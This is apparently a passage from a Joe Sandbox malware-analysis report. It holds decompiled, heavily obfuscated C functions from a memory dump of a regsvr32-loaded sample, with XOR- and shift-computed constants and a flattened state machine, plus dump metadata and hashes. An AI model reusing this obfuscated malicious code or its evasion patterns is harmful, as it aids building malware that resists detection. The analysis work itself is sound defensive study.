                                                                                                                				signed int _v1232;
                                                                                                                				signed int _v1236;
                                                                                                                				signed int _v1240;
                                                                                                                				signed int _v1244;
                                                                                                                				signed int _v1248;
                                                                                                                				signed int _v1252;
                                                                                                                				void* _t529;
                                                                                                                				void* _t531;
                                                                                                                				intOrPtr _t534;
                                                                                                                				intOrPtr _t536;
                                                                                                                				intOrPtr* _t544;
                                                                                                                				signed int _t553;
                                                                                                                				intOrPtr _t554;
                                                                                                                				intOrPtr* _t555;
                                                                                                                				signed int _t556;
                                                                                                                				signed int _t557;
                                                                                                                				signed int _t558;
                                                                                                                				signed int _t559;
                                                                                                                				signed int _t560;
                                                                                                                				signed int _t561;
                                                                                                                				signed int _t562;
                                                                                                                				signed int _t563;
                                                                                                                				signed int _t564;
                                                                                                                				signed int _t565;
                                                                                                                				signed int _t566;
                                                                                                                				signed int _t567;
                                                                                                                				void* _t568;
                                                                                                                				void* _t620;
                                                                                                                				signed int _t622;
                                                                                                                				signed int* _t626;
                                                                                                                
                                                                                                                				_t626 =  &_v1252;
                                                                                                                				_v1120 = 0x119309;
                                                                                                                				_v1120 = _v1120 ^ 0x5c748870;
                                                                                                                				_v1048 = 0;
                                                                                                                				_t620 = 0xb91f4a5;
                                                                                                                				_t556 = 0x28;
                                                                                                                				_v1120 = _v1120 / _t556;
                                                                                                                				_v1120 = _v1120 ^ 0x024f53ca;
                                                                                                                				_v1228 = 0x79d756;
                                                                                                                				_v1228 = _v1228 + 0xfffff93d;
                                                                                                                				_v1228 = _v1228 | 0xe3cb3b46;
                                                                                                                				_v1228 = _v1228 + 0x1302;
                                                                                                                				_v1228 = _v1228 ^ 0x63fc0ed8;
                                                                                                                				_v1172 = 0xe9915e;
                                                                                                                				_v1172 = _v1172 ^ 0xe1bebd5b;
                                                                                                                				_v1172 = _v1172 + 0xf473;
                                                                                                                				_v1172 = _v1172 ^ 0xe158207a;
                                                                                                                				_v1232 = 0x1d0c2f;
                                                                                                                				_v1232 = _v1232 << 5;
                                                                                                                				_t557 = 0x13;
                                                                                                                				_v1232 = _v1232 * 0x1d;
                                                                                                                				_v1232 = _v1232 + 0xffff0974;
                                                                                                                				_v1232 = _v1232 ^ 0x694b33d5;
                                                                                                                				_v1244 = 0x49a320;
                                                                                                                				_v1244 = _v1244 / _t557;
                                                                                                                				_v1244 = _v1244 ^ 0xa0ae19a1;
                                                                                                                				_v1244 = _v1244 >> 3;
                                                                                                                				_v1244 = _v1244 ^ 0x14148cb7;
                                                                                                                				_v1160 = 0x2c918e;
                                                                                                                				_v1160 = _v1160 ^ 0x0eac0473;
                                                                                                                				_v1160 = _v1160 << 0xd;
                                                                                                                				_v1160 = _v1160 ^ 0x12b54449;
                                                                                                                				_v1136 = 0x622af6;
                                                                                                                				_v1136 = _v1136 + 0xfea4;
                                                                                                                				_t558 = 0x4d;
                                                                                                                				_v1136 = _v1136 / _t558;
                                                                                                                				_v1136 = _v1136 ^ 0x0007c842;
                                                                                                                				_v1112 = 0x58ca81;
                                                                                                                				_v1112 = _v1112 ^ 0x5c6bee45;
                                                                                                                				_v1112 = _v1112 ^ 0x42cec489;
                                                                                                                				_v1112 = _v1112 ^ 0x1efba26b;
                                                                                                                				_v1212 = 0x20d381;
                                                                                                                				_v1212 = _v1212 << 7;
                                                                                                                				_t559 = 0xf;
                                                                                                                				_v1212 = _v1212 / _t559;
                                                                                                                				_v1212 = _v1212 | 0x1e192722;
                                                                                                                				_v1212 = _v1212 ^ 0x1f1b6437;
                                                                                                                				_v1100 = 0x5437a8;
                                                                                                                				_v1100 = _v1100 + 0xffffcc2e;
                                                                                                                				_v1100 = _v1100 ^ 0x005e23e3;
                                                                                                                				_v1140 = 0x4cda07;
                                                                                                                				_t560 = 0x2c;
                                                                                                                				_v1140 = _v1140 / _t560;
                                                                                                                				_v1140 = _v1140 + 0xffffbaf6;
                                                                                                                				_v1140 = _v1140 ^ 0x0003f658;
                                                                                                                				_v1216 = 0x8d4852;
                                                                                                                				_v1216 = _v1216 | 0xe03670ed;
                                                                                                                				_v1216 = _v1216 + 0x1fd0;
                                                                                                                				_t561 = 0x43;
                                                                                                                				_t622 = 0x33;
                                                                                                                				_v1216 = _v1216 * 0x51;
                                                                                                                				_v1216 = _v1216 ^ 0x1c99c980;
                                                                                                                				_v1224 = 0xcb3fbd;
                                                                                                                				_v1224 = _v1224 >> 3;
                                                                                                                				_v1224 = _v1224 >> 2;
                                                                                                                				_v1224 = _v1224 + 0x6dd5;
                                                                                                                				_v1224 = _v1224 ^ 0x0000b11a;
                                                                                                                				_v1084 = 0xbbd54d;
                                                                                                                				_v1084 = _v1084 + 0xffff0a96;
                                                                                                                				_v1084 = _v1084 ^ 0x00b3a670;
                                                                                                                				_v1092 = 0xc23c8a;
                                                                                                                				_v1092 = _v1092 | 0xdd0bee58;
                                                                                                                				_v1092 = _v1092 ^ 0xddcf2329;
                                                                                                                				_v1116 = 0x207c7d;
                                                                                                                				_v1116 = _v1116 >> 0xc;
                                                                                                                				_v1116 = _v1116 + 0xffffbc2e;
                                                                                                                				_v1116 = _v1116 ^ 0xfff0c7a0;
                                                                                                                				_v1208 = 0xff5fdc;
                                                                                                                				_v1208 = _v1208 >> 3;
                                                                                                                				_v1208 = _v1208 / _t561;
                                                                                                                				_v1208 = _v1208 + 0x5b99;
                                                                                                                				_v1208 = _v1208 ^ 0x000c7d9c;
                                                                                                                				_v1124 = 0x938ccb;
                                                                                                                				_v1124 = _v1124 | 0xf2a59521;
                                                                                                                				_v1124 = _v1124 ^ 0xa01ac2d2;
                                                                                                                				_v1124 = _v1124 ^ 0x52a0185f;
                                                                                                                				_v1132 = 0xbf625c;
                                                                                                                				_v1132 = _v1132 + 0xffff41d1;
                                                                                                                				_v1132 = _v1132 ^ 0xb6f0ee0a;
                                                                                                                				_v1132 = _v1132 ^ 0xb64f7318;
                                                                                                                				_v1200 = 0x35e8ef;
                                                                                                                				_v1200 = _v1200 | 0x212573b9;
                                                                                                                				_v1200 = _v1200 + 0x895;
                                                                                                                				_v1200 = _v1200 + 0xffff839b;
                                                                                                                				_v1200 = _v1200 ^ 0x213eef56;
                                                                                                                				_v1108 = 0x42ec6a;
                                                                                                                				_v1108 = _v1108 << 7;
                                                                                                                				_v1108 = _v1108 | 0x6f96b0e8;
                                                                                                                				_v1108 = _v1108 ^ 0x6ff9d07a;
                                                                                                                				_v1068 = 0x16fbe8;
                                                                                                                				_v1068 = _v1068 ^ 0x63830919;
                                                                                                                				_v1068 = _v1068 ^ 0x6391d514;
                                                                                                                				_v1076 = 0xf1aa89;
                                                                                                                				_v1076 = _v1076 / _t622;
                                                                                                                				_v1076 = _v1076 ^ 0x0003c711;
                                                                                                                				_v1104 = 0xeb7cfe;
                                                                                                                				_v1104 = _v1104 | 0xf803cf3c;
                                                                                                                				_v1104 = _v1104 ^ 0xf8e77bb5;
                                                                                                                				_v1128 = 0x581134;
                                                                                                                				_v1128 = _v1128 + 0x5fcb;
                                                                                                                				_v1128 = _v1128 ^ 0xf5e3fdb9;
                                                                                                                				_v1128 = _v1128 ^ 0xf5b0cdf6;
                                                                                                                				_v1152 = 0xd7df19;
                                                                                                                				_v1152 = _v1152 >> 6;
                                                                                                                				_v1152 = _v1152 | 0xfed84a26;
                                                                                                                				_v1152 = _v1152 ^ 0xfedeec45;
                                                                                                                				_v1180 = 0xaef471;
                                                                                                                				_v1180 = _v1180 >> 6;
                                                                                                                				_v1180 = _v1180 >> 0xd;
                                                                                                                				_v1180 = _v1180 << 6;
                                                                                                                				_v1180 = _v1180 ^ 0x000710e2;
                                                                                                                				_v1204 = 0x713a97;
                                                                                                                				_v1204 = _v1204 + 0x3418;
                                                                                                                				_t562 = 0x1c;
                                                                                                                				_v1204 = _v1204 / _t562;
                                                                                                                				_t563 = 0x7a;
                                                                                                                				_v1204 = _v1204 / _t563;
                                                                                                                				_v1204 = _v1204 ^ 0x00050502;
                                                                                                                				_v1164 = 0x147100;
                                                                                                                				_t564 = 0x2e;
                                                                                                                				_v1164 = _v1164 * 0x76;
                                                                                                                				_v1164 = _v1164 | 0x902fa50e;
                                                                                                                				_v1164 = _v1164 ^ 0x996cda68;
                                                                                                                				_v1088 = 0x82e762;
                                                                                                                				_v1088 = _v1088 << 4;
                                                                                                                				_v1088 = _v1088 ^ 0x0826efad;
                                                                                                                				_v1168 = 0x563db6;
                                                                                                                				_v1168 = _v1168 ^ 0x21efc68d;
                                                                                                                				_v1168 = _v1168 << 0xa;
                                                                                                                				_v1168 = _v1168 ^ 0xe7e33000;
                                                                                                                				_v1064 = 0x7b43bb;
                                                                                                                				_v1064 = _v1064 >> 0x10;
                                                                                                                				_v1064 = _v1064 ^ 0x000ef1dc;
                                                                                                                				_v1096 = 0xaa2599;
                                                                                                                				_v1096 = _v1096 + 0xffff8899;
                                                                                                                				_v1096 = _v1096 ^ 0x00af913c;
                                                                                                                				_v1144 = 0x28f47d;
                                                                                                                				_v1144 = _v1144 + 0xfdab;
                                                                                                                				_v1144 = _v1144 / _t564;
                                                                                                                				_v1144 = _v1144 ^ 0x00098579;
                                                                                                                				_v1236 = 0xa8cb0e;
                                                                                                                				_v1236 = _v1236 + 0xffff80d7;
                                                                                                                				_v1236 = _v1236 >> 2;
                                                                                                                				_v1236 = _v1236 + 0xcae3;
                                                                                                                				_v1236 = _v1236 ^ 0x0028dc98;
                                                                                                                				_v1196 = 0x7a9110;
                                                                                                                				_v1196 = _v1196 + 0x60a3;
                                                                                                                				_t565 = 0x6e;
                                                                                                                				_v1196 = _v1196 * 0x30;
                                                                                                                				_v1196 = _v1196 + 0x17b0;
                                                                                                                				_v1196 = _v1196 ^ 0x17089a70;
                                                                                                                				_v1220 = 0xa39dc0;
                                                                                                                				_v1220 = _v1220 * 0x1a;
                                                                                                                				_v1220 = _v1220 | 0x3f29037d;
                                                                                                                				_v1220 = _v1220 << 2;
                                                                                                                				_v1220 = _v1220 ^ 0xfef582ff;
                                                                                                                				_v1056 = 0x8ce45d;
                                                                                                                				_v1056 = _v1056 + 0xffff44b0;
                                                                                                                				_v1056 = _v1056 ^ 0x0082f469;
                                                                                                                				_v1188 = 0x8fb898;
                                                                                                                				_v1188 = _v1188 + 0xffff6148;
                                                                                                                				_v1188 = _v1188 >> 0xf;
                                                                                                                				_v1188 = _v1188 + 0x5d28;
                                                                                                                				_v1188 = _v1188 ^ 0x00098e48;
                                                                                                                				_v1248 = 0xf9f351;
                                                                                                                				_v1248 = _v1248 / _t565;
                                                                                                                				_t566 = 7;
                                                                                                                				_v1248 = _v1248 / _t566;
                                                                                                                				_t567 = 0x36;
                                                                                                                				_v1248 = _v1248 / _t567;
                                                                                                                				_v1248 = _v1248 ^ 0x000dac8c;
                                                                                                                				_v1156 = 0xcd3e80;
                                                                                                                				_v1156 = _v1156 >> 9;
                                                                                                                				_v1156 = _v1156 >> 5;
                                                                                                                				_v1156 = _v1156 ^ 0x000f52af;
                                                                                                                				_v1080 = 0xad13e3;
                                                                                                                				_v1080 = _v1080 + 0xffff9fdf;
                                                                                                                				_v1080 = _v1080 ^ 0x00a9049f;
                                                                                                                				_v1252 = 0xc8e468;
                                                                                                                				_v1252 = _v1252 + 0x68f9;
                                                                                                                				_v1252 = _v1252 ^ 0xdefda593;
                                                                                                                				_v1252 = _v1252 + 0x3ccc;
                                                                                                                				_v1252 = _v1252 ^ 0xde346202;
                                                                                                                				_v1148 = 0xed4461;
                                                                                                                				_t366 =  &_v1148; // 0xed4461
                                                                                                                				_t553 = _v1048;
                                                                                                                				_v1148 =  *_t366 * 0xe;
                                                                                                                				_v1148 = _v1148 + 0x7c4c;
                                                                                                                				_v1148 = _v1148 ^ 0x0cf78b8d;
                                                                                                                				_v1060 = 0xe451d2;
                                                                                                                				_v1060 = _v1060 ^ 0x875d8056;
                                                                                                                				_v1060 = _v1060 ^ 0x87bb8ca0;
                                                                                                                				_v1072 = 0x7df350;
                                                                                                                				_v1072 = _v1072 ^ 0x9db8ae0b;
                                                                                                                				_v1072 = _v1072 ^ 0x9dc57cd0;
                                                                                                                				_v1240 = 0x736124;
                                                                                                                				_v1240 = _v1240 + 0x9999;
                                                                                                                				_v1240 = _v1240 ^ 0x06a9f39e;
                                                                                                                				_v1240 = _v1240 | 0x60d165a2;
                                                                                                                				_v1240 = _v1240 ^ 0x66d70585;
                                                                                                                				_v1052 = 0x13e6cc;
                                                                                                                				_v1052 = _v1052 | 0xd39d947e;
                                                                                                                				_v1052 = _v1052 ^ 0xd3985d28;
                                                                                                                				_v1176 = 0xb655df;
                                                                                                                				_v1176 = _v1176 << 5;
                                                                                                                				_v1176 = _v1176 + 0xb0db;
                                                                                                                				_v1176 = _v1176 << 0xe;
                                                                                                                				_v1176 = _v1176 ^ 0xdb2d551e;
                                                                                                                				_v1184 = 0x6ea346;
                                                                                                                				_v1184 = _v1184 << 3;
                                                                                                                				_v1184 = _v1184 / _t622;
                                                                                                                				_v1184 = _v1184 << 0xf;
                                                                                                                				_v1184 = _v1184 ^ 0xad62c0fd;
                                                                                                                				_v1192 = 0x1e416;
                                                                                                                				_v1192 = _v1192 ^ 0x082852f8;
                                                                                                                				_v1192 = _v1192 + 0xffff737f;
                                                                                                                				_v1192 = _v1192 * 0x7a;
                                                                                                                				_v1192 = _v1192 ^ 0xe39273d4;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t568 = 0x5c;
                                                                                                                					while(1) {
                                                                                                                						L2:
                                                                                                                						_t529 = 0x8516fff;
                                                                                                                						do {
                                                                                                                							L3:
                                                                                                                							if(_t620 == 0x487d47d) {
                                                                                                                								_t491 =  &_v1176; // 0xe158207a
                                                                                                                								E001B3CBE( *_t491, _v1044, _v1184, _v1192);
                                                                                                                								_t620 = 0xb449de7;
                                                                                                                								goto L18;
                                                                                                                							} else {
                                                                                                                								if(_t620 == 0x62db77f) {
                                                                                                                									_push(_v1224);
                                                                                                                									_push(0x1a10bc);
                                                                                                                									_push(_v1216);
                                                                                                                									_t531 = E001BF5D9(_v1100, _v1140, __eflags);
                                                                                                                									_t534 =  *0x1c4c10; // 0x67d820
                                                                                                                									_t536 =  *0x1c4c10; // 0x67d820
                                                                                                                									E001AD467(_v1092, __eflags, _v1116, _t536 + 4, _v1100, _v1208, _t534 + 0x20c, _v1124, _t531,  &_v1040,  &_v520, _v1132);
                                                                                                                									E001BF94B(_t531, _v1200, _v1108, _v1068, _v1076);
                                                                                                                									_t626 =  &(_t626[0x10]);
                                                                                                                									_t620 = 0xb1ab9aa;
                                                                                                                									goto L1;
                                                                                                                								} else {
                                                                                                                									if(_t620 == _t529) {
                                                                                                                										_t544 = E001B7A67(_v1044, _v1232, _v1248, _t553, _v1148, _v1060, _v1072, _v1240,  &_v1040, _v1052, 2 + E001B0184(_v1248, _v1156,  &_v1040, _v1080, _v1252) * 2);
                                                                                                                										_t626 =  &(_t626[0xc]);
                                                                                                                										__eflags = _t544;
                                                                                                                										_t620 = 0x487d47d;
                                                                                                                										_v1048 = 0 | __eflags == 0x00000000;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											_t568 = 0x5c;
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										if(_t620 == 0x8df682f) {
                                                                                                                											_push(_v1180);
                                                                                                                											_push(0x1a110c);
                                                                                                                											_push(_v1152);
                                                                                                                											_t579 = _v1104;
                                                                                                                											__eflags = E001A3E99(_v1104, _v1228, _v1204, _v1104, E001BF5D9(_v1104, _v1128, __eflags), _t579, _v1164, _v1088,  &_v1044, _v1168, _t579, _v1172, _v1064, _v1096, _t579, _v1144, _v1236);
                                                                                                                											_t620 =  ==  ? 0x8516fff : 0xb449de7;
                                                                                                                											E001BF94B(_t545, _v1196, _v1220, _v1056, _v1188);
                                                                                                                											_t626 =  &(_t626[0x15]);
                                                                                                                											L18:
                                                                                                                											_t529 = 0x8516fff;
                                                                                                                											_t568 = 0x5c;
                                                                                                                										} else {
                                                                                                                											if(_t620 == 0xb1ab9aa) {
                                                                                                                												_t554 =  *0x1c4c10; // 0x67d820
                                                                                                                												_t555 = _t554 + 0x20c;
                                                                                                                												while(1) {
                                                                                                                													__eflags =  *_t555 - _t568;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														break;
                                                                                                                													}
                                                                                                                													_t555 = _t555 + 2;
                                                                                                                													__eflags = _t555;
                                                                                                                												}
                                                                                                                												_t553 = _t555 + 2;
                                                                                                                												_t620 = 0x8df682f;
                                                                                                                												goto L2;
                                                                                                                											} else {
                                                                                                                												if(_t620 == 0xb91f4a5) {
                                                                                                                													E001A3466(_v1120, _v1244, _t568, _t568,  &_v520, _v1160, _t568, _v1136, _v1112, _v1212);
                                                                                                                													_t626 =  &(_t626[8]);
                                                                                                                													_t620 = 0x62db77f;
                                                                                                                													while(1) {
                                                                                                                														L1:
                                                                                                                														_t568 = 0x5c;
                                                                                                                														L2:
                                                                                                                														_t529 = 0x8516fff;
                                                                                                                														goto L3;
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							__eflags = _t620 - 0xb449de7;
                                                                                                                						} while (__eflags != 0);
                                                                                                                						return _v1048;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















































































                                                                                                                0x001bdadd
                                                                                                                0x001bdae7
                                                                                                                0x001bdaea
                                                                                                                0x001bdaee
                                                                                                                0x001bdaf6
                                                                                                                0x001bdafe
                                                                                                                0x001bdb05
                                                                                                                0x001bdb0f
                                                                                                                0x001bdb17
                                                                                                                0x001bdb22
                                                                                                                0x001bdb2d
                                                                                                                0x001bdb38
                                                                                                                0x001bdb40
                                                                                                                0x001bdb48
                                                                                                                0x001bdb50
                                                                                                                0x001bdb58
                                                                                                                0x001bdb60
                                                                                                                0x001bdb68
                                                                                                                0x001bdb6d
                                                                                                                0x001bdb74
                                                                                                                0x001bdb78
                                                                                                                0x001bdb80
                                                                                                                0x001bdb88
                                                                                                                0x001bdb93
                                                                                                                0x001bdb9e
                                                                                                                0x001bdba9
                                                                                                                0x001bdbb4
                                                                                                                0x001bdbbf
                                                                                                                0x001bdbca
                                                                                                                0x001bdbd2
                                                                                                                0x001bdbda
                                                                                                                0x001bdbe2
                                                                                                                0x001bdbea
                                                                                                                0x001bdbf2
                                                                                                                0x001bdbfd
                                                                                                                0x001bdc08
                                                                                                                0x001bdc13
                                                                                                                0x001bdc1b
                                                                                                                0x001bdc20
                                                                                                                0x001bdc28
                                                                                                                0x001bdc2d
                                                                                                                0x001bdc35
                                                                                                                0x001bdc3d
                                                                                                                0x001bdc48
                                                                                                                0x001bdc4c
                                                                                                                0x001bdc51
                                                                                                                0x001bdc59
                                                                                                                0x001bdc61
                                                                                                                0x001bdc69
                                                                                                                0x001bdc76
                                                                                                                0x001bdc7a
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x001bdc8a
                                                                                                                0x001bdc8a
                                                                                                                0x001bdc90
                                                                                                                0x001bdefc
                                                                                                                0x001bdf00
                                                                                                                0x001bdf07
                                                                                                                0x00000000
                                                                                                                0x001bdc96
                                                                                                                0x001bdc9c
                                                                                                                0x001bde49
                                                                                                                0x001bde4d
                                                                                                                0x001bde52
                                                                                                                0x001bde64
                                                                                                                0x001bde8d
                                                                                                                0x001bde9c
                                                                                                                0x001bdebb
                                                                                                                0x001bdedb
                                                                                                                0x001bdee0
                                                                                                                0x001bdee3
                                                                                                                0x00000000
                                                                                                                0x001bdca2
                                                                                                                0x001bdca4
                                                                                                                0x001bde29
                                                                                                                0x001bde30
                                                                                                                0x001bde33
                                                                                                                0x001bde35
                                                                                                                0x001bde3d
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x00000000
                                                                                                                0x001bdc84
                                                                                                                0x001bdcaa
                                                                                                                0x001bdcb0
                                                                                                                0x001bdd24
                                                                                                                0x001bdd28
                                                                                                                0x001bdd2d
                                                                                                                0x001bdd38
                                                                                                                0x001bdd9c
                                                                                                                0x001bddb9
                                                                                                                0x001bddbc
                                                                                                                0x001bddc1
                                                                                                                0x001bdf09
                                                                                                                0x001bdf0b
                                                                                                                0x001bdf10
                                                                                                                0x001bdcb2
                                                                                                                0x001bdcb8
                                                                                                                0x001bdd01
                                                                                                                0x001bdd07
                                                                                                                0x001bdd12
                                                                                                                0x001bdd12
                                                                                                                0x001bdd15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd17
                                                                                                                0x001bdd1a
                                                                                                                0x00000000
                                                                                                                0x001bdcba
                                                                                                                0x001bdcc0
                                                                                                                0x001bdcf2
                                                                                                                0x001bdcf7
                                                                                                                0x001bdcfa
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x00000000
                                                                                                                0x001bdc85
                                                                                                                0x001bdc82
                                                                                                                0x001bdcc0
                                                                                                                0x001bdcb8
                                                                                                                0x001bdcb0
                                                                                                                0x001bdca4
                                                                                                                0x001bdc9c
                                                                                                                0x001bdf11
                                                                                                                0x001bdf11
                                                                                                                0x001bdf2a
                                                                                                                0x001bdf2a
                                                                                                                0x001bdc85

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $as$(]$Ek\$V>!$aD$jB$z X$}| $#^$p6
                                                                                                                • API String ID: 0-2883086406
                                                                                                                • Opcode ID: b29294bd4ddd7c74958157e1b4b3505322f984d5a7d943c7fe9b08f789d04070
                                                                                                                • Instruction ID: 6693619d0020e354cc4a12ecd54cae82f993e6c0163ca2e678e0b71a448ac45c
                                                                                                                • Opcode Fuzzy Hash: b29294bd4ddd7c74958157e1b4b3505322f984d5a7d943c7fe9b08f789d04070
                                                                                                                • Instruction Fuzzy Hash: CA3201B15083809FE3B8CF61D94AB8BBBE1BBD4718F10891DE19996260D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B9A0C(void* __ecx) {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				char _v1560;
                                                                                                                				char _v2080;
                                                                                                                				char _v2600;
                                                                                                                				signed int _v2604;
                                                                                                                				signed int _v2608;
                                                                                                                				signed int _v2612;
                                                                                                                				signed int _v2616;
                                                                                                                				signed int _v2620;
                                                                                                                				signed int _v2624;
                                                                                                                				signed int _v2628;
                                                                                                                				signed int _v2632;
                                                                                                                				signed int _v2636;
                                                                                                                				signed int _v2640;
                                                                                                                				signed int _v2644;
                                                                                                                				signed int _v2648;
                                                                                                                				signed int _v2652;
                                                                                                                				signed int _v2656;
                                                                                                                				signed int _v2660;
                                                                                                                				signed int _v2664;
                                                                                                                				signed int _v2668;
                                                                                                                				signed int _v2672;
                                                                                                                				signed int _v2676;
                                                                                                                				signed int _v2680;
                                                                                                                				signed int _v2684;
                                                                                                                				signed int _v2688;
                                                                                                                				signed int _v2692;
                                                                                                                				signed int _v2696;
                                                                                                                				signed int _v2700;
                                                                                                                				signed int _v2704;
                                                                                                                				signed int _v2708;
                                                                                                                				signed int _v2712;
                                                                                                                				signed int _v2716;
                                                                                                                				signed int _v2720;
                                                                                                                				signed int _v2724;
                                                                                                                				signed int _v2728;
                                                                                                                				signed int _v2732;
                                                                                                                				signed int _v2736;
                                                                                                                				signed int _v2740;
                                                                                                                				signed int _v2744;
                                                                                                                				signed int _v2748;
                                                                                                                				signed int _v2752;
                                                                                                                				signed int _v2756;
                                                                                                                				signed int _v2760;
                                                                                                                				signed int _v2764;
                                                                                                                				signed int _v2768;
                                                                                                                				signed int _v2772;
                                                                                                                				signed int _v2776;
                                                                                                                				signed int _v2780;
                                                                                                                				signed int _v2784;
                                                                                                                				signed int _v2788;
                                                                                                                				signed int _v2792;
                                                                                                                				signed int _t509;
                                                                                                                				signed int _t525;
                                                                                                                				signed int _t528;
                                                                                                                				signed int _t529;
                                                                                                                				signed int _t530;
                                                                                                                				signed int _t531;
                                                                                                                				signed int _t532;
                                                                                                                				signed int _t533;
                                                                                                                				signed int _t534;
                                                                                                                				signed int _t535;
                                                                                                                				signed int _t536;
                                                                                                                				signed int _t537;
                                                                                                                				signed int _t538;
                                                                                                                				signed int _t539;
                                                                                                                				void* _t594;
                                                                                                                				void* _t595;
                                                                                                                				signed int* _t599;
                                                                                                                
                                                                                                                				_t599 =  &_v2792;
                                                                                                                				_v2756 = 0x8b462a;
                                                                                                                				_v2756 = _v2756 << 7;
                                                                                                                				_v2756 = _v2756 << 2;
                                                                                                                				_t594 = __ecx;
                                                                                                                				_t595 = 0x2b81e36;
                                                                                                                				_t528 = 0x7f;
                                                                                                                				_v2756 = _v2756 / _t528;
                                                                                                                				_v2756 = _v2756 ^ 0x002d73a6;
                                                                                                                				_v2708 = 0x633b85;
                                                                                                                				_v2708 = _v2708 >> 7;
                                                                                                                				_v2708 = _v2708 + 0x5922;
                                                                                                                				_v2708 = _v2708 ^ 0x0003c950;
                                                                                                                				_v2784 = 0xe426c6;
                                                                                                                				_v2784 = _v2784 ^ 0xd2dd7835;
                                                                                                                				_v2784 = _v2784 << 7;
                                                                                                                				_v2784 = _v2784 << 3;
                                                                                                                				_v2784 = _v2784 ^ 0xe5718cdd;
                                                                                                                				_v2752 = 0xd0eee8;
                                                                                                                				_t529 = 0x54;
                                                                                                                				_v2752 = _v2752 * 0x25;
                                                                                                                				_v2752 = _v2752 * 0x1c;
                                                                                                                				_v2752 = _v2752 | 0x8383c9b1;
                                                                                                                				_v2752 = _v2752 ^ 0xcf8aa7ef;
                                                                                                                				_v2644 = 0xdaa9c4;
                                                                                                                				_v2644 = _v2644 << 3;
                                                                                                                				_v2644 = _v2644 ^ 0x06d49410;
                                                                                                                				_v2776 = 0xe490f3;
                                                                                                                				_v2776 = _v2776 | 0x6931665c;
                                                                                                                				_v2776 = _v2776 ^ 0x92a35c95;
                                                                                                                				_v2776 = _v2776 + 0x5def;
                                                                                                                				_v2776 = _v2776 ^ 0xfb543939;
                                                                                                                				_v2720 = 0x26d621;
                                                                                                                				_v2720 = _v2720 / _t529;
                                                                                                                				_v2720 = _v2720 + 0xfffffe3e;
                                                                                                                				_t530 = 0x2c;
                                                                                                                				_v2720 = _v2720 / _t530;
                                                                                                                				_v2720 = _v2720 ^ 0x00031e9d;
                                                                                                                				_v2768 = 0x9ff49c;
                                                                                                                				_v2768 = _v2768 >> 0xd;
                                                                                                                				_v2768 = _v2768 + 0x8c12;
                                                                                                                				_t531 = 0x3e;
                                                                                                                				_t525 = 0x6c;
                                                                                                                				_v2768 = _v2768 * 0x6a;
                                                                                                                				_v2768 = _v2768 ^ 0x003bfbed;
                                                                                                                				_v2604 = 0x2c76cd;
                                                                                                                				_v2604 = _v2604 / _t531;
                                                                                                                				_v2604 = _v2604 ^ 0x0005e9c3;
                                                                                                                				_v2652 = 0x67c066;
                                                                                                                				_v2652 = _v2652 + 0x8a90;
                                                                                                                				_v2652 = _v2652 ^ 0x006fea0e;
                                                                                                                				_v2744 = 0xb6bdce;
                                                                                                                				_v2744 = _v2744 + 0xffff673d;
                                                                                                                				_v2744 = _v2744 / _t525;
                                                                                                                				_v2744 = _v2744 >> 5;
                                                                                                                				_v2744 = _v2744 ^ 0x0005d1a5;
                                                                                                                				_v2760 = 0x12c367;
                                                                                                                				_v2760 = _v2760 ^ 0xaed4666a;
                                                                                                                				_v2760 = _v2760 + 0xffffa2e1;
                                                                                                                				_v2760 = _v2760 << 0xd;
                                                                                                                				_v2760 = _v2760 ^ 0xc8f43720;
                                                                                                                				_v2700 = 0x77851a;
                                                                                                                				_v2700 = _v2700 >> 6;
                                                                                                                				_v2700 = _v2700 << 1;
                                                                                                                				_v2700 = _v2700 ^ 0x000de19f;
                                                                                                                				_v2728 = 0xf7c46c;
                                                                                                                				_t532 = 0x64;
                                                                                                                				_v2728 = _v2728 / _t532;
                                                                                                                				_v2728 = _v2728 << 8;
                                                                                                                				_v2728 = _v2728 >> 0xe;
                                                                                                                				_v2728 = _v2728 ^ 0x00061015;
                                                                                                                				_v2684 = 0x3733b7;
                                                                                                                				_v2684 = _v2684 + 0x8c33;
                                                                                                                				_t533 = 0x42;
                                                                                                                				_v2684 = _v2684 * 0x1e;
                                                                                                                				_v2684 = _v2684 ^ 0x068d1aa9;
                                                                                                                				_v2608 = 0xa30c57;
                                                                                                                				_v2608 = _v2608 | 0x32f38184;
                                                                                                                				_v2608 = _v2608 ^ 0x32fef82e;
                                                                                                                				_v2792 = 0x4dd6a5;
                                                                                                                				_v2792 = _v2792 + 0x34a9;
                                                                                                                				_v2792 = _v2792 + 0xffff2f8e;
                                                                                                                				_v2792 = _v2792 << 0xe;
                                                                                                                				_v2792 = _v2792 ^ 0x4eb4c2c8;
                                                                                                                				_v2660 = 0x67d938;
                                                                                                                				_v2660 = _v2660 * 0x2a;
